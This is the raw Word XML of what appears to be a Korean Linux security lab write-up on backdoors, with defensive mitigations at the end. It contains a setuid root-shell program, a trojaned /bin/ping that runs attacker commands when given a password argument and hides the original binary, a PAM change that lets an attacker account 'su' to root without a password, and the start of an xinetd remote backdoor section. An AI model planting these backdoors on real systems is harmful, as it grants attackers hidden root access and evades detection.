                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="666666"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6570E1A8" w14:textId="3E406199" w:rsidR="002761E0" w:rsidRDefault="002761E0" w:rsidP="00836B5D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="66666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E154167" wp14:editId="507AEEA6">
                  <wp:extent cx="6645910" cy="564515"/>
                  <wp:effectExtent l="0" t="0" r="254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D99" w14:paraId="206117D1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5F8C31D8" w14:textId="238C5220" w:rsidR="001E0EEF" w:rsidRPr="00BE7966" w:rsidRDefault="001E0EEF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:rsidRPr="002761E0" w14:paraId="057D712F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1938D21D" w14:textId="77777777" w:rsidR="002761E0" w:rsidRDefault="002761E0" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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2761E0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r w:rsidRPr="002761E0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>및 GUID 변경 파일 생성 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002761E0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2761E0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>이 접근하는 일반계정)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D90E1E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vim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etuid_root.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A36F9E7" w14:textId="43962D9D" w:rsidR="00024BC1" w:rsidRPr="00024BC1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0F88D6C" wp14:editId="51141820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-227965</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="9734550"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="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1333" id="직사각형 27" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:-17.95pt;width:533.25pt;height:766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msswIAAK0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 xml:space="preserve"> cat </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00024BC1" w:rsidRPr="00024BC1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>setuid_root.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6A1DDDC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tdio.h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16D1BA04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6D9F111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main(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7201C2D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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="489C654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etre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0, 0);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를 한꺼번에 바꿔주는 함수,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가 root여야 실행가능</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E6576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system("/bin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h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");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B3882B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return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077BC89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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CB2312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gc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-o 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_file_check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etuid_root.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360D37B1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chmo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4755 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_file_check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341E4616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ll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_file_check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37C7C280" w14:textId="08738A18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wsr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-x. 1 root root 8416 12월 14 15:47 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tmp_file_check</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="6B576839" w14:textId="77777777" w:rsidTr="00CD7C05">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="712BF109" w14:textId="77777777" w:rsidR="002761E0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일반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계정으로 접근 후 파일을 실행시키면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가 0으로 변경된 것을 확인가능</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F7F0EF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C9CC5E" wp14:editId="41B22E74">
                  <wp:extent cx="2943225" cy="2762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BEF8A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D71EC0" wp14:editId="13C3A044">
                  <wp:extent cx="6645910" cy="612140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CD49" w14:textId="4186EE09" w:rsidR="00024BC1" w:rsidRPr="00BE7966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t>이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후 cat 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/shadow 명령어를 실행했을 때 내용이 보인다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="0F0C224A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0713FA67" w14:textId="77777777" w:rsidR="002761E0" w:rsidRDefault="00024BC1" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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t>프로그램으로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위장한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백도어</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="59E58406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t>위장할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목록 체크</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7311DB04" w14:textId="57CE2DD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find /bin/ -prem -4000 -print</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w14:paraId="3A56D370" w14:textId="77777777" w:rsidTr="00CD7C05">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F28C693" w14:textId="14E21232" w:rsidR="00024BC1" w:rsidRPr="00024BC1" w:rsidRDefault="00024BC1" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:leftChars="0" w:left="0"/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8D145B" wp14:editId="1C5299B6">
                  <wp:extent cx="4086225" cy="29432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C1" w14:paraId="0A4D33DE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46FD5932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t>코드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작성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A493BF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fake_ping.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작성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613B6356" w14:textId="7CFD5BF8" w:rsidR="00024BC1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024BC1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">vim </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00024BC1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>fake_ping.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="55FAEF96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0A64672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tdio.h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35E973A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tring.h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5806D1C4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tdlib.h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18AA2EF6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3D85647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main(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, char **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v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2D72C380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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C2D9F2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0); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C2FE797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UID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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를 root(0)으로 변경하는 함수, 함수 실행을 위해선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가 root여야함</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D45B0D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EUID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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를 root로 하려면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가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설정되어있어야함</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="11B601B4" w14:textId="53000A40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E6C1329" w14:textId="45FD718A" w:rsidR="00024BC1" w:rsidRPr="00024BC1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6F9A4DC" wp14:editId="10C301AF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-214630</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="9734550"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="0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34689" id="직사각형 29" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-16.9pt;width:533.25pt;height:766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kDswIAAK0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6327CB4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if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(!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strcmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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v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[1], "poopoo")) // 첫번째 인자가 지정한 문자열과 같은지를 비교하고</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AE7CA0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  <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28EFB61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        system(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v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[2])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; /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/같으면 두번째 인자를 시스템 함수로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실행후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종료</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2900B3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       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exit(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0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330C87EE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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C7721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8704115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char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100];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457D97F9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int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7E3C1806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272A5F3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memset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, 0, 20); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63553A36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//메모리 초기화 함수,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라는 변수를 20바이트만큼 0값으로 초기화(입력)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A708C6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</w:p>
          <w:p w14:paraId="3E0887FE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strcat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, ".");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685602F9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//문자열 연결함수,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라는 변수의 첫번째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글자로 .을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입력함</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BCF34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</w:r>
          </w:p>
          <w:p w14:paraId="59CDEF6A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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C66A2AE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for(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=0;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&lt;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;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++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) /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c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의 개수만큼 반복됨</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187BB9A4" w14:textId="406B3CA8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</w:t>
            </w:r>
            <w:r w:rsidR="00836B5D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D02C5E8" wp14:editId="1E6F3D0F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54" name="직사각형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A5D29" id="직사각형 54" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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CNtA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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8D868B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ab/>
              <w:t>/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변수에 명령행으로 입력된 인자들을 연결시킨다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196F64A8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strcat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argv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]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6175328F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strcat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, " ");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68217442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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6675FFC9" w14:textId="77777777" w:rsidR="00024BC1" w:rsidRP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       system(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)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; /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input_cmd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>에 저장된 문자열을 system 함수로 실행함</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C3F9A6" w14:textId="57E2ACDE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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w14:paraId="5B536845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4EBD9D96" w14:textId="77777777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24BC1" w14:paraId="5B1A020B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28B0D53B" w14:textId="77777777" w:rsidR="00024BC1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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>설치</w:t>
            </w:r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스크립트 작성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544E4E2D" w14:textId="22F0FEB8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1) 원본 ping 유틸리티를 이용함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w14:paraId="05E56F61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34679C56" w14:textId="2A88B59A" w:rsidR="00024BC1" w:rsidRPr="001E0EEF" w:rsidRDefault="00CD7C05" w:rsidP="00836B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9AB9994" wp14:editId="272FAB4B">
                  <wp:extent cx="4638675" cy="4857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C1" w14:paraId="25E90D3C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4B24218" w14:textId="77777777" w:rsidR="00024BC1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2)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파일 작성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B21555" w14:textId="740FE58E" w:rsidR="00CD7C05" w:rsidRPr="001E0EEF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24BC1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024BC1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024BC1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024BC1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vim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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w14:paraId="6A2BB103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3B05D791" w14:textId="10063F18" w:rsidR="00024BC1" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00836B5D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AAF2647" wp14:editId="0C5C523B">
                  <wp:extent cx="4229100" cy="31146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C1" w14:paraId="05CBA007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1E98C358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3. 설치 스크립트 일반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퍼미션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부여 및 실행</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/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~]#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chmo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755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658AD93D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mv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 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1ABCE3F0" w14:textId="0DEB54BC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5DD131C" wp14:editId="186CCA5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-214630</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="973455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FAD1" id="직사각형 30" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-16.9pt;width:533.25pt;height:766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FF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ll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4A2197DC" w14:textId="379C9ACC" w:rsidR="00024BC1" w:rsidRPr="001E0EEF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wxr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-x. 1 root root 510 12월 14 17:47 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tmp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nstall.sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w14:paraId="124D372F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2F9F2A8C" w14:textId="20D27BF7" w:rsidR="00024BC1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lastRenderedPageBreak/>
              <w:t>이 후 일반계정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(원격터미널)</w:t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에서 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확인 &gt;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변조된 ping 프로그램으로 root 접근 가능</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D31AABA" w14:textId="06FE2C14" w:rsid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FED9FE7" wp14:editId="3A1C5A4D">
                  <wp:extent cx="6645910" cy="1763395"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="825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C57E9" w14:textId="696F0ECF" w:rsidR="00CD7C05" w:rsidRDefault="00836B5D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4980AD7" wp14:editId="37E4CCA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55" name="직사각형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8E4D" id="직사각형 55" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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Be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>u</w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05"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 w:rsidR="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>0 으로</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> 변경되었지만 </w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">서버에서는 </w:t>
            </w:r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>일반유저로 접속해</w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05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>있는</w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05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CD7C05" w:rsidRPr="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>것으로 보이게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB7596B" w14:textId="77777777" w:rsid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7AE4E5" wp14:editId="0FABD8E5">
                  <wp:extent cx="6645910" cy="850900"/>
                  <wp:effectExtent l="0" t="0" r="254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091C" w14:textId="77777777" w:rsid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기존 원본파일은 /bin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/.ping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으로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숨겨지게되고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/bin/ping 파일은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fake_ping.c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의 코드로 대체되었다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A312E97" w14:textId="57C0EF02" w:rsid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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>일반</w:t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>적인 find /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bin/ -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>perm -4000 -exec ls -al {} \; 명령어를 통해 확인해도 우리가 만든 교체파일만 보이게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>된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D0B8C4" w14:textId="5FC6A9C5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36BE4C6" wp14:editId="3D346396">
                  <wp:extent cx="5314950" cy="31432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BC1" w14:paraId="2D05D971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DC0EB0B" w14:textId="77777777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24BC1" w14:paraId="3A65E8BC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8FDC470" w14:textId="77777777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24BC1" w14:paraId="79EFFFF2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1B9D3B13" w14:textId="103058E8" w:rsidR="00024BC1" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00836B5D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:color w:val="FF0000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color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>!!정상 ping 파일로 되돌리기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="712387C3" w14:textId="77777777" w:rsidTr="00CD7C05">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01B3AFCB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rpm -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qf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/bin/ping</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656BB5BE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rpm -e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putils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nodeps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="01D8B1A4" w14:textId="7028204D" w:rsidR="002761E0" w:rsidRPr="00BE7966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yum -y install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iputils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="34D61585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4C5A0747" w14:textId="70F9BD9F" w:rsidR="002761E0" w:rsidRPr="001E0EEF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책방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD7C05" w14:paraId="545B6D57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6EBA7A20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- find 명령을 통해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가 부여된 프로그램 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330B3030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-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가 부여된 프로그램들을 따로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목록화하여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관리</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0A0BB6" w14:textId="7777777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- Partition Mounting 시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가 불필요한 파티션에는 --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nosui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옵션으로 마운트</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A50604" w14:textId="70E0B718" w:rsid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- 무결성 점검 도구를 통해 기존의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SetUI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파일의 무결성 확보</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0056B3E3" w14:textId="3F93C8E3" w:rsidR="006830B9" w:rsidRDefault="006830B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38E8E66" w14:textId="77777777" w:rsidR="006830B9" w:rsidRDefault="006830B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B3F3EDC" w14:textId="7D2CC522" w:rsidR="006830B9" w:rsidRPr="00CD7C05" w:rsidRDefault="006830B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14:paraId="7BC46B0F" w14:textId="77777777" w:rsidTr="002761E0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24D1449D" w:rsidR="002761E0" w:rsidRPr="00CD7C05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CD7C05" w:rsidRPr="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Remote </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CD7C05" w:rsidRPr="00CD7C05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CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05" w:rsidRPr="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">PAM을 이용한 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CD7C05" w:rsidRPr="00CD7C05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CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="6439ACFB" w14:textId="77777777" w:rsidTr="002761E0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034EE2A2" w14:textId="77777777" w:rsidR="002761E0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FDE9" id="직사각형 60" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-5.25pt;margin-top:-48.65pt;width:533.25pt;height:766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362FD636" w14:textId="6F82ADB5" w:rsidR="00CD7C05" w:rsidRPr="00BE7966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14:paraId="74A41711" w14:textId="77777777" w:rsidTr="002761E0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572AE331" w14:textId="77777777" w:rsidR="002761E0" w:rsidRDefault="00CD7C05" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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공격자가 사용할 계정준비</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A0169B3" w14:textId="030F323E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</w:t>
            </w:r>
            <w:r w:rsidR="00836B5D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79073509" wp14:editId="248A832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56" name="직사각형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D4C9F" id="직사각형 56" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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DxtA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CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>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user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0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]#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userad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whitehacker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="21CDF105" w14:textId="1340B373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user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0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]#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passwd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whitehacker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="1565D6FC" w14:textId="77777777" w:rsidTr="00CD7C0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1FFBAE99" w14:textId="0D2DE00B" w:rsidR="002761E0" w:rsidRPr="00747A65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14:paraId="3BD04F5B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5DABE48" w14:textId="77777777" w:rsidR="002761E0" w:rsidRDefault="00CD7C05" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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공격 대상의 pam 서비스 수정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69173EC7" w14:textId="268B81A7" w:rsidR="00CD7C05" w:rsidRPr="00CD7C05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D7C0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user</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0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]#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD7C05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r w:rsidRPr="00CD7C05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D7C05">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="18B0F559" w14:textId="77777777" w:rsidTr="002761E0">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11F254EE" w14:textId="4CD2D8EE" w:rsidR="002761E0" w:rsidRDefault="00CD7C0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FD90A50" wp14:editId="546D6F76">
                  <wp:extent cx="6645910" cy="1252220"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="508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E0" w14:paraId="512A49CE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22D143FF" w14:textId="2E41F2ED" w:rsidR="002761E0" w:rsidRPr="007950B5" w:rsidRDefault="002761E0" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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="007950B5" w:rsidRPr="007950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>putty로 공격대상 접근</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="08F9BA33" w14:textId="77777777" w:rsidTr="002761E0">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19864B11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1)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whitehacker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로그인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFA97E7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&gt; /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/shadow 접근 거부</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA252C1" w14:textId="1A6EAD8F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22250E6" wp14:editId="10CCC357">
                  <wp:extent cx="3752850" cy="37147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4DAE25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2)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su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root로 root계정 접근</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E00A59" w14:textId="17EA6E13" w:rsidR="002761E0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&gt; pam 서비스를 변경하였으므로 즉시 성공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CE4F0A1" wp14:editId="5ED9C0D4">
                  <wp:extent cx="3752850" cy="15430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E0" w14:paraId="7748DA2E" w14:textId="51B5497D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2D12471" w14:textId="178D92DD" w:rsidR="002761E0" w:rsidRPr="00FC1ECD" w:rsidRDefault="002761E0" w:rsidP="00836B5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830B9" w14:paraId="59ABD332" w14:textId="77777777" w:rsidTr="008C29A8">
        <w:trPr>
          <w:trHeight w:val="4675"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C865D08" w14:textId="2D47F876" w:rsidR="006830B9" w:rsidRPr="0004419D" w:rsidRDefault="006830B9" w:rsidP="00836B5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2761E0" w14:paraId="180F3E40" w14:textId="77777777" w:rsidTr="007950B5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451FACC" w14:textId="217E999E" w:rsidR="002761E0" w:rsidRPr="007950B5" w:rsidRDefault="00723DD9" w:rsidP="00836B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0D7F594" wp14:editId="47F4E49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37" name="직사각형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35C49" id="직사각형 37" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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ES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d2fUq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7950B5">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>4)</w:t>
            </w:r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 xml:space="preserve">Remote </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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 xml:space="preserve"> - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>Xinetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">를 이용한 원격 접속 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007950B5" w:rsidRPr="007950B5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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="491B9480" w14:textId="77777777" w:rsidTr="007950B5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02F7360D" w14:textId="77777777" w:rsidR="002761E0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19B2D09" w14:textId="0F030C30" w:rsidR="007950B5" w:rsidRPr="00BE7966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14:paraId="05A3EEDC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1E62ED18" w14:textId="77777777" w:rsidR="002761E0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설치</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66988E9C" w14:textId="014354EA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yum install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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="15B463D5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20DC7BC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03463E9F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05707D45" w14:textId="77777777" w:rsid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설정파일</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DBDEFAF" w14:textId="77777777" w:rsid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sy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설정을 복사하여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ftp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를 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생성한다.(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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rsy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가 없다면 다음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sshd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를 활용한 실습을 진행할 것)</w:t>
            </w:r>
          </w:p>
